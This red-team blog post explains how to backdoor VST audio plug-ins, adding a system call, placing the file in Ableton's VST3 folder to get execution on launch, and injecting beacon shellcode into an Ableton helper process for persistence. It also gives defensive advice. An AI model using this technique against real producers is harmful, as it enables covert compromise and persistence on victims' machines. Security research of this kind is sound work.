VST Audio Plug-ins for Initial Access and Persistence
Abusing Virtual Studio Technology (VST) for red team initial access and persistence.
Background
VST (Virtual Studio Technology) is a software interface standard developed by Steinberg Media in 1996. They allow music producers to use digital audio plug-ins like instruments (synthesisers, drum machines, etc.) and effects (guitar pedals, etc.) within their DAW software like Ableton Live, Cubase or FL Studio. They have an important role in modern music production environments, with both paid and free/open-source VSTs available from popular sites like KVR Audio.
I know that VST plug-in piracy is common within the producer community (even in professional and enterprise studio environments). With this in mind, I decided to do some reading on the security of the VST standard, to see how difficult it would be to tamper with and backdoor a plugin.
Command Execution
On Windows systems, a VST plug-in is a multi-threaded DLL which is packed into a folder structure (for macOS, it’s a Mach-O bundle) which means that creating a simple plugin that executes some commands should be straightforward. Steinberg has a “Hello World” VST3 example plugin and build instructions on their GitHub, which provides a simple template for us to work from (here).
git clone https://github.com/steinbergmedia/vst3_example_plugin_hello_world.git
mkdir build
cd build
cmake ../vst3_example_plugin_hello_world
cmake --build .
Adding command execution is as simple as prepending a system call before instantiating the plugin in "HelloWorldController".
Recompile the plugin and relocate it to the default VST3 directory for the DAW. In my case, with Ableton Live on Windows, the default path is:
C:\Program Files\Common Files\VST3\
When the plugin is launched in Ableton Live, the command runs without interruption of the DAW's operation, and we see our result.
Persistence
Executing arbitrary code is simple, but a technique for persistence is what makes it especially interesting. Instead of relying on the target to launch the VST within their DAW, we can ensure execution as soon as the DAW opens.
When Ableton detects changes to plugins in the default VST3 directory, it triggers initialisation by calling functions from "DLLMain" in the VST. Therefore, any new plug-in located within the default directory will execute each time Ableton is launched.
Using Ableton as an example, consider the following: a simple shellcode runner to execute beacon shellcode within the remote process "AbletonPushCpl.exe". This is Ableton's USB Audio Class Driver Control Panel process which exists as a child of “explorer.exe” and is present on Windows computers with Ableton Installed - ensuring our beacon lives on after Ableton is quit by the target.
Note that execution will occur again only if the user re-opens the VST inside Ableton, as initialisation only occurs when Ableton detects a new or modified VST in the default directory. In theory, the code could automate this to become a self-propagating VST.
Conclusion
Detection rates for malicious VST plugins remain low, as most vendors appear to ignore the VST format entirely. Given that most independent music producers, who are probably prime targets for this, wouldn’t typically have EDR systems installed, there's a high chance that targeted attacks would succeed.
Of course, downloading and running VSTs on personal or domain-joined computers (like those in production studios or universities) from unknown sources is a bad idea. Treat them like any other executable file.
I think whilst Ableton and other DAW manufacturers aren't solely responsible for preventing malicious VSTs, adding an option to allow only VSTs with valid code signatures would be a great starting point to reduce the impact of this vector.
Update: For macOS, there’s some interesting articles by SpecterOps and Csaba Fitzl which explore the weaponisation of Apple Audio Units (AU) - Apple’s competing audio plugin format to VST - for unsigned code execution and persistence, which are absolutely worth a read: